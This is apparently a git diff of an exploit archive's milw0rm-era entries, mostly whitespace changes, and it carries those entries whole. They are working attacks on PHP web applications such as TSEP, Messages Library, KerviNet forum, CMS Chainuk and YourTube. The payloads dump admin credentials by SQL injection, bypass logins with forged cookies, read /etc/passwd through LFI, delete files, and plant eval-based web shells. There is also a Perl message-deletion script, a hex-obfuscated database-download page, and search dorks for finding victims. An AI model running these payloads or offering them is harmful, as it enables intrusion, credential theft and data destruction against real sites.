-/include/timeneeded.php
-/include/colorcycle.php
-/include/dbconnection.php
-/include/resultnumber.php
-/include/copyright.php
-/include/notifyofstopwords.php
-/inclued/oldmysqltell.php
-/include/indexstatus.php
-/include/pagenavigation.php
-/include/searchterm.php
-/include/stampittimestamp.php
-/include/ranking.php
-/include/ipfunctions.php
-/include/indexer_search_table.php
-/include/printpagedetails.php
-/include/deletefile.php
-/include/uploadfile.php
-/include/configfunctions.php
------------------------------------------------------------------------------
-
-
-
-
-
-## ## ## ## ## ## 
-
-PHPINFO:
------------------------------------------------------------------------------
-/admin/tsepinfo.php
------------------------------------------------------------------------------
-
-
-
-
-## ## ## ## ## ## 
-
-others's exploits:
-/admin/configcontentimages.php/">{XSS}<"
-/include/indexer_search_table.php?tsep_lng[help_copyright]=">{XSS}<"
-/tsepsearch.php?q=sa&s=0&e=10&user_e=10/">{XSS}<a"
-/tsepsearch.php?q={XSS}&s=0&e=10/&user_e=10
-
-# milw0rm.com [2009-06-30]
+TSEP <=0.942.02 Vulnerabilities
+http://tsep.sourceforge.net
+
+Dork: "powered by TSEP - The Search Engine Project"
+
+(c)eLwaux 30.06.2009, uasc.org.ua
+
+
+## ## ## ## ## ## 
+
+Blind SQL-Inj
+/admin/rankform.php
+
+-----------------------------------------------------------------------------
+23:  // Delete the contents
+24:  if ((isset ($_POST["delete"])) && (isset ($_POST["deleteRank"]))) {
+25:   $percent = $_POST['deleteRank'];
+26:   $sql_del = "DELETE FROM $db_tablename WHERE valuepercent='$percent'";
+27:  
+28:   mysql_query($sql_del);
+29:  }
+-----------------------------------------------------------------------------
+
+exploit (BlindSQLinj after DELETE):
+POST: delete = .
+POST: deleteRank = '{SQL}-- 
+
+exploit2 (BlindSQLinj after UPDATE):
+POST: modify = .
+POST: modifyRank = . 
+POST: display = .
+POST: comment = .
+POST: alt = .
+POST: percent = '{SQL}-- 
+
+
+
+
+## ## ## ## ## ## 
+
+SQL-Inj
+/admin/rankform.php
+
+-----------------------------------------------------------------------------
+54:  if ((isset ($_POST["insert"])) && (isset ($_POST["insertNewRank"]))) {
+55:   $alt           = $_POST['alt'];
+56:   $image_show    = $_POST['image_show'];
+57:   $comment       = $_POST['comment'];
+58:   $percent       = $_POST['percent'];
+59: $display       = reslash($_POST['display']);
+60:
+61: if (($percent > "0") && ($percent <= "100")) {
+62: $sql_ins = "INSERT INTO $db_tablename (alt_tag,display,valuepercent,image_show,comment)
+63:    VALUES ('$alt','$display','$percent','$image_show','$comment')";
+64:         mysql_query($sql_ins);
+65: }
+66: $sql_upd = "UPDATE $db_tablename SET image_show='$image_show'";
+67: mysql_query($sql_upd);
+68:
+69:  }
+-----------------------------------------------------------------------------
+
+exploit:
+POST: insertNewRank = .
+POST: insert = .
+POST: percent = 1
+POST: alt = 1',( select concat_ws(0x3a,username,passwd,email,question,answer) from tsep_users ),1,1,1);-- 
+POST: image_show = 1
+POST: comment = 1
+POST: display = 1
+then goto /admin/rankform.php and look admin name & passwd & email & question and answer
+
+
+
+## ## ## ## ## ## 
+
+LFI
+/admin/index.php
+
+-----------------------------------------------------------------------------
+335:  if ( isset( $_POST ) and count( $_POST ) > 0 ) {
+336:      $_GET = $_POST;
+337:  }
+338:  if ( !isset($_GET["lang"]) )
+339:   if ( !isset($_SESSION["lang"]) )
+340:   $_GET["lang"] = "en_US";
+341:   else
+342:   $_GET["lang"] = $_SESSION["lang"];
+345:  if ( $_GET["lang"] != "en_US" )
+345:   require_once( "../language/" . $_GET["lang"] . "/language.php" );
+-----------------------------------------------------------------------------
+
+exploit:
+GET: /admin/?lang=../{FILE.PHP}%00
+
+
+
+
+
+## ## ## ## ## ## 
+
+Blind SQL-inj
+/admin/indexoverview.php
+
+-----------------------------------------------------------------------------
+29: if (isset($_GET['order'])) // for userdefined search order, otherwise sort by time of entry: Title ASC
+30: { // write new values
+31: $db_tablename = $db_table_prefix."internal";
+32: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['order']."' WHERE description='tsepindexovervieworder'";
+33: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error());
+34: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['dir']."' WHERE description='tsepindexoverviewdirection'";
+35: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error());
+36: }
+-----------------------------------------------------------------------------
+
+exploit:
+GET: order = '+and+1=if(select+ascii(lower(substring(passwd,1,1)))>90+from+tsep_users+where+username='adminame',1,0)-- 
+
+
+
+
+
+## ## ## ## ## ## 
+
+XSS
+/admin/configuration.php
+
+-----------------------------------------------------------------------------
+137:     <form name="tsepconfig" id="tsepconfig" method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
+154:     <form name="frmMaxResultNew" id="frmMaxResultNew" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
+164:     <form name="frmMaxR....ckForm" id="frmMaxResult" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
+-----------------------------------------------------------------------------
+
+exploit:
+GET: /configuration.php/"><script>alert(/xss/);</script><a%20"
+
+
+
+## ## ## ## ## ## 
+
+XSS
+/admin/index.php
+
+-----------------------------------------------------------------------------
+97:    if ( isset( $_GET["errorMsg"] ) ) {
+100:        $html .= "            <td class=\"errorMessage\">".addslashes( $_GET["errorMsg"] )."</td>\n";
+107:        unset( $_GET["errorMsg"] );
+108:    }
+-----------------------------------------------------------------------------
+
+exploit:
+GET: /admin/?errorMsg=<script>alert(/xss/);</script>
+
+
+
+
+## ## ## ## ## ## 
+
+Path disk:
+-----------------------------------------------------------------------------
+/admin/examples/phpcrawl4tsep.php
+/admin/examples/fillwithcontent.php
+/admin/examples/urllist.php
+/include/indexingtimetaken.php
+/include/timeneeded.php
+/include/colorcycle.php
+/include/dbconnection.php
+/include/resultnumber.php
+/include/copyright.php
+/include/notifyofstopwords.php
+/inclued/oldmysqltell.php
+/include/indexstatus.php
+/include/pagenavigation.php
+/include/searchterm.php
+/include/stampittimestamp.php
+/include/ranking.php
+/include/ipfunctions.php
+/include/indexer_search_table.php
+/include/printpagedetails.php
+/include/deletefile.php
+/include/uploadfile.php
+/include/configfunctions.php
+-----------------------------------------------------------------------------
+
+
+
+
+
+## ## ## ## ## ## 
+
+PHPINFO:
+-----------------------------------------------------------------------------
+/admin/tsepinfo.php
+-----------------------------------------------------------------------------
+
+
+
+
+## ## ## ## ## ## 
+
+others's exploits:
+/admin/configcontentimages.php/">{XSS}<"
+/include/indexer_search_table.php?tsep_lng[help_copyright]=">{XSS}<"
+/tsepsearch.php?q=sa&s=0&e=10&user_e=10/">{XSS}<a"
+/tsepsearch.php?q={XSS}&s=0&e=10/&user_e=10
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9059.htm b/platforms/php/webapps/9059.htm
index 69e90593f..0d62763e1 100755
--- a/platforms/php/webapps/9059.htm
+++ b/platforms/php/webapps/9059.htm
@@ -1,22 +1,22 @@
-<head>
-<title>ThE g0bL!N  Messages Library 2.0 Remote Add Admintsrator Account 
-
-
-
-
    
-
-    
-      
-      
-    
-    
-      
-      
-    
-  
    Username 
    Password 
    
-  
    
-
    
-
-
-
-# milw0rm.com [2009-06-30]
+
+ThE g0bL!N  Messages Library 2.0 Remote Add Admintsrator Account 
+
+
+
+
    
+
+    
+      
+      
+    
+    
+      
+      
+    
+  
    Username 
    Password 
    
+  
    
+
    
+
+
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9062.txt b/platforms/php/webapps/9062.txt
index 80e7f7ef7..2c95fc8ca 100755
--- a/platforms/php/webapps/9062.txt
+++ b/platforms/php/webapps/9062.txt
@@ -1,21 +1,21 @@
-#!/usr/bin/perl -w
-#  Messages Library 2.0 <=  Arbitrary Delete Message
-########################################
-#[*] Founded &  Exploited by : Stack
-########################################
-print "\t\t############################################################\n\n";
-print "\t\t#   Messages Library 2.0 <=  Arbitrary Delete Message      #\n\n";
-print "\t\t#                          by Stack                        #\n\n";
-print "\t\t############################################################\n\n";
-use LWP::UserAgent;
-die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
-print "\n[!] ContactID : ";
-chomp(my $id=);
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id."";
-$res = $b->request(HTTP::Request->new(POST=>$host));
-        print "\nBrought to you by v4-team.com...\n";
-        print "\n[+] Message Deleted \n";
-
-# milw0rm.com [2009-07-01]
+#!/usr/bin/perl -w
+#  Messages Library 2.0 <=  Arbitrary Delete Message
+########################################
+#[*] Founded &  Exploited by : Stack
+########################################
+print "\t\t############################################################\n\n";
+print "\t\t#   Messages Library 2.0 <=  Arbitrary Delete Message      #\n\n";
+print "\t\t#                          by Stack                        #\n\n";
+print "\t\t############################################################\n\n";
+use LWP::UserAgent;
+die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
+print "\n[!] ContactID : ";
+chomp(my $id=);
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id."";
+$res = $b->request(HTTP::Request->new(POST=>$host));
+        print "\nBrought to you by v4-team.com...\n";
+        print "\n[+] Message Deleted \n";
+
+# milw0rm.com [2009-07-01]
diff --git a/platforms/php/webapps/9063.txt b/platforms/php/webapps/9063.txt
index d15145004..e68ec0097 100755
--- a/platforms/php/webapps/9063.txt
+++ b/platforms/php/webapps/9063.txt
@@ -1,17 +1,17 @@
-# Messages Library 2.0 <=  Arbitrary Database Download Vulnerability
-########################################
-#[*] Founded &  Exploited by : Stack
-########################################
- 
-Bypass with
- 
-javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
-javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
- 
-After Exec
- 
-http://localhost/sms/admin/backup.php
- 
-and you got the database download
-
-# milw0rm.com [2009-07-01]
+# Messages Library 2.0 <=  Arbitrary Database Download Vulnerability
+########################################
+#[*] Founded &  Exploited by : Stack
+########################################
+ 
+Bypass with
+ 
+javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
+javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
+ 
+After Exec
+ 
+http://localhost/sms/admin/backup.php
+ 
+and you got the database download
+
+# milw0rm.com [2009-07-01]
diff --git a/platforms/php/webapps/9068.txt b/platforms/php/webapps/9068.txt
index c07419c66..4b9c72759 100755
--- a/platforms/php/webapps/9068.txt
+++ b/platforms/php/webapps/9068.txt
@@ -1,110 +1,110 @@
-dork: "Copyright KerviNet"
-eLwaux(c) 20.06.2009
-
-## ## ## ##
-Blind SQLinj
-/index.php
--------------------------------------------------------------------------------------------------
-if($_COOKIE['user_enter']=="auto") {
-$enter_login=$_COOKIE['enter_login'];
-$enter_parol=$_COOKIE['enter_parol'];
-$mysql->query("SELECT name, pass, status FROM users WHERE name =
-'".$enter_login."' AND pass = '".$enter_parol."'");
--------------------------------------------------------------------------------------------------
-exploit:
-  COOKIE: user_enter=auto
-  COOKIE: enter_login = abc
-  COOKIE: enter_parol = ' or name = (select name from users where
-id_user=1) and '1'='1';
-  sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc'
-AND pass = '' or name = (select name from users where id_user<10 limit
-1)
-и вы автоматом зайдете под админом, даже не зная его имени (:
-
-
-
-## ## ## ##
-SQLinj
-/message.php
--------------------------------------------------------------------------------------------------
-9:  $topic=$_GET['topic'];
-18: if($topic) {
-69: $mysql->query("SELECT name, viewing, voting, status, top_status,
-id_forum FROM topics WHERE id_topic = ".$topic);
-exploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users
--------------------------------------------------------------------------------------------------
-
-
-## ## ## ##
-SiXSS
-/message.php
-exploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users
-
-
-## ## ## ##
-aXSS
-/add_voting.php
--------------------------------------------------------------------------------------------------
-22: $topic=$_GET['topic'];
-61: if($topic) {
-66: 	 $forum_edit->add_voting($time, $topic, $v_vopros, $variants);
-74: }
-
-function add_voting($time, $topic, $v_vopros, $variants) {
-global $user;
-global $user_ip;
-if($user) {
-global $mysql;
-$mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic);
-$mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")");
-$id_vname=mysql_insert_id();
-for($i=0; $iquery("INSERT INTO v_variants VALUES (".$vr_nom.",
-'".$variants[$i]."', ".$id_vname.")");
-}
-}
-return $id_vname;
-}
--------------------------------------------------------------------------------------------------
-
-exploit:/add_voting.php?topic=1
-   POST: add_voting = ok_add
-   POST: v_vopros = v
-   POST: v_variant1 = {XSS}
-   POST: v_variant2 = v2
-
-
-## ## ## ##
-users deleating
-/admin/edit_user.php
--------------------------------------------------------------------------------------------------
-$del_user_id=$_POST['del_user_id'];
-$mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id);
--------------------------------------------------------------------------------------------------
-exploit:
-   POST: del_user_id=(select user_id from users limit 1)
-
-
-## ## ## ##
-Path Disclosure
--------------------------------------------------------------------------------------------------
-/include_files/voting_diagram.php
-/include_files/voting.php
-/include_files/topics_search.php
-/include_files/topics_list.php
-/include_files/top_part.php
-/include_files/quick_search.php
-/include_files/quick_reply.php
-/include_files/moder_menu.php
-/include_files/messages_list.php
-/include_files/menu.php
-/include_files/head.php
-/include_files/forums_list.php
-/include_files/forum_statistics.php
-/include_files/forum_info.php
-/include_files/birthday.php
-/admin/head.php
--------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2009-07-01]
+dork: "Copyright KerviNet"
+eLwaux(c) 20.06.2009
+
+## ## ## ##
+Blind SQLinj
+/index.php
+-------------------------------------------------------------------------------------------------
+if($_COOKIE['user_enter']=="auto") {
+$enter_login=$_COOKIE['enter_login'];
+$enter_parol=$_COOKIE['enter_parol'];
+$mysql->query("SELECT name, pass, status FROM users WHERE name =
+'".$enter_login."' AND pass = '".$enter_parol."'");
+-------------------------------------------------------------------------------------------------
+exploit:
+  COOKIE: user_enter=auto
+  COOKIE: enter_login = abc
+  COOKIE: enter_parol = ' or name = (select name from users where
+id_user=1) and '1'='1';
+  sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc'
+AND pass = '' or name = (select name from users where id_user<10 limit
+1)
+и вы автоматом зайдете под админом, даже не зная его имени (:
+
+
+
+## ## ## ##
+SQLinj
+/message.php
+-------------------------------------------------------------------------------------------------
+9:  $topic=$_GET['topic'];
+18: if($topic) {
+69: $mysql->query("SELECT name, viewing, voting, status, top_status,
+id_forum FROM topics WHERE id_topic = ".$topic);
+exploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users
+-------------------------------------------------------------------------------------------------
+
+
+## ## ## ##
+SiXSS
+/message.php
+exploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users
+
+
+## ## ## ##
+aXSS
+/add_voting.php
+-------------------------------------------------------------------------------------------------
+22: $topic=$_GET['topic'];
+61: if($topic) {
+66: 	 $forum_edit->add_voting($time, $topic, $v_vopros, $variants);
+74: }
+
+function add_voting($time, $topic, $v_vopros, $variants) {
+global $user;
+global $user_ip;
+if($user) {
+global $mysql;
+$mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic);
+$mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")");
+$id_vname=mysql_insert_id();
+for($i=0; $iquery("INSERT INTO v_variants VALUES (".$vr_nom.",
+'".$variants[$i]."', ".$id_vname.")");
+}
+}
+return $id_vname;
+}
+-------------------------------------------------------------------------------------------------
+
+exploit:/add_voting.php?topic=1
+   POST: add_voting = ok_add
+   POST: v_vopros = v
+   POST: v_variant1 = {XSS}
+   POST: v_variant2 = v2
+
+
+## ## ## ##
+users deleating
+/admin/edit_user.php
+-------------------------------------------------------------------------------------------------
+$del_user_id=$_POST['del_user_id'];
+$mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id);
+-------------------------------------------------------------------------------------------------
+exploit:
+   POST: del_user_id=(select user_id from users limit 1)
+
+
+## ## ## ##
+Path Disclosure
+-------------------------------------------------------------------------------------------------
+/include_files/voting_diagram.php
+/include_files/voting.php
+/include_files/topics_search.php
+/include_files/topics_list.php
+/include_files/top_part.php
+/include_files/quick_search.php
+/include_files/quick_reply.php
+/include_files/moder_menu.php
+/include_files/messages_list.php
+/include_files/menu.php
+/include_files/head.php
+/include_files/forums_list.php
+/include_files/forum_statistics.php
+/include_files/forum_info.php
+/include_files/birthday.php
+/admin/head.php
+-------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2009-07-01]
diff --git a/platforms/php/webapps/9069.txt b/platforms/php/webapps/9069.txt
index 8a22c6155..887ab3358 100755
--- a/platforms/php/webapps/9069.txt
+++ b/platforms/php/webapps/9069.txt
@@ -1,138 +1,138 @@
-CMS Chainuk <= v.1.2 Vulns
-Home: Cms.tut.su
-Dork: "Cms.tut.su, 2009 g."
-
-eLwaux(c) 14.06.2
-
-
-## ## ## ## ## ##
-
-LFI
-/index.php
----------------------------------------------------------------------------
-6:   if (isset($_GET ['id']))
-7:   {
-8:   [color=white]$id = $_GET ['id'];[/color]
-9:   }
-10:  else
-11:  {
-12:   $id = $index;
-13:  }
-14:  if (file_exists ("content/" . $id . ".php"))
-15:  {
-16:   [color=white]include ("content/" . $id . ".php");[/color]
-17:  }
-18:  else
-19:  {
-20:   include ('404.html'); exit;
-21:  }
---------------------------------------------------------------------------
-
-exploit:
-     index.php?id=../../../../etc/passwd%00
-
-
-## ## ## ## ## ##
-
-LFI
-/admin/admin_edit.php
----------------------------------------------------------------------------
-2:   if (isset($_GET['id']))
-3:   {
-4:   [color=white]$id = $_GET['id'];[/color]
-5:   if (!file_exists("../content/" . $id . ".php")) die ("..");
-6:   [color=white]include("../content/" . $id . ".php");[/color]
-23:  }
------------------------------------------------------------------------------
-
-exploit:
-    index.php?id=../../../../etc/passwd%00
-
-
-## ## ## ## ## ##
-
-delete any files ()
-/admin/admin_delete.php[
----------------------------------------------------------------------------
-3:  if([color=white]unlink('../content/'.$_GET['id'].'.php')[/color])
-4:  {
-5:  echo 'Page '.$_GET['id'].' deleted';[/code]
------------------------------------------------------------------------------
-
-exploit:
-   /admin/admin_delete.php?id=../FILE.PHP%00
-
-
-## ## ## ## ## ##
-
-LFI / XSS / Shell
-/admin/admin_menu.php
------------------------------------------------------------------------------
-37:  $menu = explode (',', $_POST['menu']);
-38:  $csvcont ='';
-39:  foreach ($menu as $a)
-40:  {
-41:   if (!preg_match("/[0-9]/", $a)) die ("error");
-42:   if (!file_exists("../content/" . $a . ".php")) die ("error");
-43:   [color=white]include ("../content/" . $a . ".php");[/color]
-44:   $csvcont = $csvcont . $a . ";" . $page_4menu . "\n";
-45:  }
-65:  if (!file_put_contents("../menu.csv", $csvcont)) ..
------------------------------------------------------------------------------
-
-exploits:
-    LFI POST: menu=../1/../FILE.PHP%00,1,2,3,4,5,6,7
-    XSS POST: menu=../1../onmousemove="javascript:alert(document.cookies)">>/../index;,1,2,3,4,5,6,7
-    Shell: if  POST: menu=../1
-/../admin/passw,1,2,3,4,5,6,7
-                                 /?id=../menu.csv%00&a=phpinfo();[/CoDE]
-
-
-## ## ## ## ## ##
-
-Shell
-/admin_settings.php
------------------------------------------------------------------------------
-39:  if (!isset($_POST['tmpl']) || !isset($_POST['id']) ||
-!isset($_POST['menu']))
-40:  {
-41:   die ("...");
-42:  }
-43:  if (!file_exists("../templates/" . $_POST['tmpl'] .
-"/index.php")) die ("...");
-44:  if (!file_exists("../content/" . $_POST['id'] . ".php")) die ("...");
-45:  $mtpl = $_POST['menu'];
-46:  $set = "";
-63:  if (!file_put_contents("../settings.php", $set)
------------------------------------------------------------------------------
-
-exploit:
-   POST: action=abc
-                tmpl=default
-                id=1
-                menu=%TITLE%"; @eval($_GET["a"]); ?> //[/code]
-Shell: /settings.php?a=phpinfo();
-
-
-## ## ## ## ## ##
-
-Shell
-/admin_new.php
------------------------------------------------------------------------------
-POST: action=abc
-            text=abc
-            title='; @eval($_GET[a]); //
-            descr=abc
-            keys=abc
-            link=abc[/code]
-/content/=NUMBER.php?a=phpinfo();
-
-
-## ## ## ## ## ##
-
-Path Disclosure
-       /index.php?id=../admin/passw
-       /admin/admin_delete.php?id=thisf0ld3risn0texi5s5
-
-# milw0rm.com [2009-07-01]
+CMS Chainuk <= v.1.2 Vulns
+Home: Cms.tut.su
+Dork: "Cms.tut.su, 2009 g."
+
+eLwaux(c) 14.06.2
+
+
+## ## ## ## ## ##
+
+LFI
+/index.php
+---------------------------------------------------------------------------
+6:   if (isset($_GET ['id']))
+7:   {
+8:   [color=white]$id = $_GET ['id'];[/color]
+9:   }
+10:  else
+11:  {
+12:   $id = $index;
+13:  }
+14:  if (file_exists ("content/" . $id . ".php"))
+15:  {
+16:   [color=white]include ("content/" . $id . ".php");[/color]
+17:  }
+18:  else
+19:  {
+20:   include ('404.html'); exit;
+21:  }
+--------------------------------------------------------------------------
+
+exploit:
+     index.php?id=../../../../etc/passwd%00
+
+
+## ## ## ## ## ##
+
+LFI
+/admin/admin_edit.php
+---------------------------------------------------------------------------
+2:   if (isset($_GET['id']))
+3:   {
+4:   [color=white]$id = $_GET['id'];[/color]
+5:   if (!file_exists("../content/" . $id . ".php")) die ("..");
+6:   [color=white]include("../content/" . $id . ".php");[/color]
+23:  }
+-----------------------------------------------------------------------------
+
+exploit:
+    index.php?id=../../../../etc/passwd%00
+
+
+## ## ## ## ## ##
+
+delete any files ()
+/admin/admin_delete.php[
+---------------------------------------------------------------------------
+3:  if([color=white]unlink('../content/'.$_GET['id'].'.php')[/color])
+4:  {
+5:  echo 'Page '.$_GET['id'].' deleted';[/code]
+-----------------------------------------------------------------------------
+
+exploit:
+   /admin/admin_delete.php?id=../FILE.PHP%00
+
+
+## ## ## ## ## ##
+
+LFI / XSS / Shell
+/admin/admin_menu.php
+-----------------------------------------------------------------------------
+37:  $menu = explode (',', $_POST['menu']);
+38:  $csvcont ='';
+39:  foreach ($menu as $a)
+40:  {
+41:   if (!preg_match("/[0-9]/", $a)) die ("error");
+42:   if (!file_exists("../content/" . $a . ".php")) die ("error");
+43:   [color=white]include ("../content/" . $a . ".php");[/color]
+44:   $csvcont = $csvcont . $a . ";" . $page_4menu . "\n";
+45:  }
+65:  if (!file_put_contents("../menu.csv", $csvcont)) ..
+-----------------------------------------------------------------------------
+
+exploits:
+    LFI POST: menu=../1/../FILE.PHP%00,1,2,3,4,5,6,7
+    XSS POST: menu=../1../onmousemove="javascript:alert(document.cookies)">>/../index;,1,2,3,4,5,6,7
+    Shell: if  POST: menu=../1
+/../admin/passw,1,2,3,4,5,6,7
+                                 /?id=../menu.csv%00&a=phpinfo();[/CoDE]
+
+
+## ## ## ## ## ##
+
+Shell
+/admin_settings.php
+-----------------------------------------------------------------------------
+39:  if (!isset($_POST['tmpl']) || !isset($_POST['id']) ||
+!isset($_POST['menu']))
+40:  {
+41:   die ("...");
+42:  }
+43:  if (!file_exists("../templates/" . $_POST['tmpl'] .
+"/index.php")) die ("...");
+44:  if (!file_exists("../content/" . $_POST['id'] . ".php")) die ("...");
+45:  $mtpl = $_POST['menu'];
+46:  $set = "";
+63:  if (!file_put_contents("../settings.php", $set)
+-----------------------------------------------------------------------------
+
+exploit:
+   POST: action=abc
+                tmpl=default
+                id=1
+                menu=%TITLE%"; @eval($_GET["a"]); ?> //[/code]
+Shell: /settings.php?a=phpinfo();
+
+
+## ## ## ## ## ##
+
+Shell
+/admin_new.php
+-----------------------------------------------------------------------------
+POST: action=abc
+            text=abc
+            title='; @eval($_GET[a]); //
+            descr=abc
+            keys=abc
+            link=abc[/code]
+/content/=NUMBER.php?a=phpinfo();
+
+
+## ## ## ## ## ##
+
+Path Disclosure
+       /index.php?id=../admin/passw
+       /admin/admin_delete.php?id=thisf0ld3risn0texi5s5
+
+# milw0rm.com [2009-07-01]
diff --git a/platforms/php/webapps/907.pl b/platforms/php/webapps/907.pl
index f9af417b9..cbac79b4c 100755
--- a/platforms/php/webapps/907.pl
+++ b/platforms/php/webapps/907.pl
@@ -67,6 +67,6 @@ while ($answer = <$socket>)
 }
 if ($success==0) {print "  [-] Exploit failed\n";}
 
-## EOF ##
-
-# milw0rm.com [2005-04-02]
+## EOF ##
+
+# milw0rm.com [2005-04-02]
diff --git a/platforms/php/webapps/9073.php b/platforms/php/webapps/9073.php
index 4abbf044a..604a7c132 100755
--- a/platforms/php/webapps/9073.php
+++ b/platforms/php/webapps/9073.php
@@ -1,27 +1,27 @@
- exploit :    YourTube <= 2.0 Remote SQL Database Disclosure
-//=> info :          http://www.ac4p.com
-//=> DORK:         "powered by yourtube"
-//=> found by:    Security Code Team - thanks for sniper code and Qabandi --
-//=> our home:        WwW.Sec-Code.com
-//=> greats 4 our members in our home --
-///                                                                             
-//           - Upload this file to Apache server and fill victim site in the feild -
-//           - press the button to download the  database -
-//           - copy admin information [ hash passwd -username-userid] :)   
-//        -now use the cookies to enter admin cp - go here => http://victim.com/path/cp -- and put there information
-//            - one by one --like this for example  javascript:document.cookie="username=admin";
-//                                       javascript:document.cookie="password=9662183a3e621d636cb373f6e18a8f04";
-//                                       javascript:document.cookie="user_id=1";
-//
-//                                \reload the page and you will be admin /
-//
-//                           pease -- visit us www.sec-code.com --
-if (isset($_GET['Qabandi'])) {
-    echo "\x3C\x66\x6F\x72\x6D\x20\x6E\x61\x6D\x65\x3D\x27\x66\x6F\x72\x6D\x77\x27\x20\x6D\x65\x74\x68\x6F\x64\x3D\x27\x70\x6F\x73\x74\x27\x20\x61\x63\x74\x69\x6F\x6E\x3D'". $_POST[victim] ."\x2F\x63\x70\x2F\x62\x61\x63\x6B\x75\x70\x2E\x70\x68\x70\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x6E\x61\x6D\x65\x3D\x27\x61\x63\x74\x69\x6F\x6E\x27\x20\x74\x79\x70\x65\x3D\x27\x68\x69\x64\x64\x65\x6E\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x79\x65\x73\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x68\x69\x64\x64\x65\x6E\x27\x20\x6E\x61\x6D\x65\x3D\x27\x74\x61\x62\x6C\x65\x6E\x5B\x5D\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x61\x63\x34\x70\x63\x6F\x6D\x5F\x75\x73\x65\x72\x73\x27\x20\x63\x68\x65\x63\x6B\x65\x64\x3D\x27\x63\x68\x65\x63\x6B\x65\x64\x27\x20\x2F\x3E\x3C\x2F\x74\x64\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x27\x20\x6E\x61\x6D\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x32\x27\x20\x63\x6C\x61\x73\x73\x3D\x27\x62\x75\x74\x74\x6F\x6E\x73\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x47\x65\x74\x20\x61\x63\x34\x70\x63\x6F\x6D\x5F\x75\x73\x65\x72\x73\x27\x20\x2F\x3E\x3C\x2F\x66\x6F\x72\x6D\x3E";
-} else{
-  echo "\x3C\x66\x6F\x72\x6D\x20\x6E\x61\x6D\x65\x3D\x27\x66\x6F\x72\x6D\x31\x27\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x27\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61\x27\x20\x61\x63\x74\x69\x6F\x6E\x3D\x27". $PHP_SELF ."\x3F\x51\x61\x62\x61\x6E\x64\x69\x3D\x31\x27\x20\x6D\x65\x74\x68\x6F\x64\x3D\x27\x70\x6F\x73\x74\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x27\x20\x73\x69\x7A\x65\x3D\x27\x32\x35\x27\x20\x6E\x61\x6D\x65\x3D\x27\x76\x69\x63\x74\x69\x6D\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x56\x49\x43\x54\x49\x4D\x2F\x53\x43\x52\x49\x50\x54\x2F\x27\x20\x2F\x3E\x3C\x62\x72\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x27\x20\x6E\x61\x6D\x65\x3D\x27\x71\x75\x62\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x4E\x65\x78\x74\x27\x3E";
-}
-?>
-
-# milw0rm.com [2009-07-02]
+ exploit :    YourTube <= 2.0 Remote SQL Database Disclosure
+//=> info :          http://www.ac4p.com
+//=> DORK:         "powered by yourtube"
+//=> found by:    Security Code Team - thanks for sniper code and Qabandi --
+//=> our home:        WwW.Sec-Code.com
+//=> greats 4 our members in our home --
+///                                                                             
+//           - Upload this file to Apache server and fill victim site in the feild -
+//           - press the button to download the  database -
+//           - copy admin information [ hash passwd -username-userid] :)   
+//        -now use the cookies to enter admin cp - go here => http://victim.com/path/cp -- and put there information
+//            - one by one --like this for example  javascript:document.cookie="username=admin";
+//                                       javascript:document.cookie="password=9662183a3e621d636cb373f6e18a8f04";
+//                                       javascript:document.cookie="user_id=1";
+//
+//                                \reload the page and you will be admin /
+//
+//                           pease -- visit us www.sec-code.com --
+if (isset($_GET['Qabandi'])) {
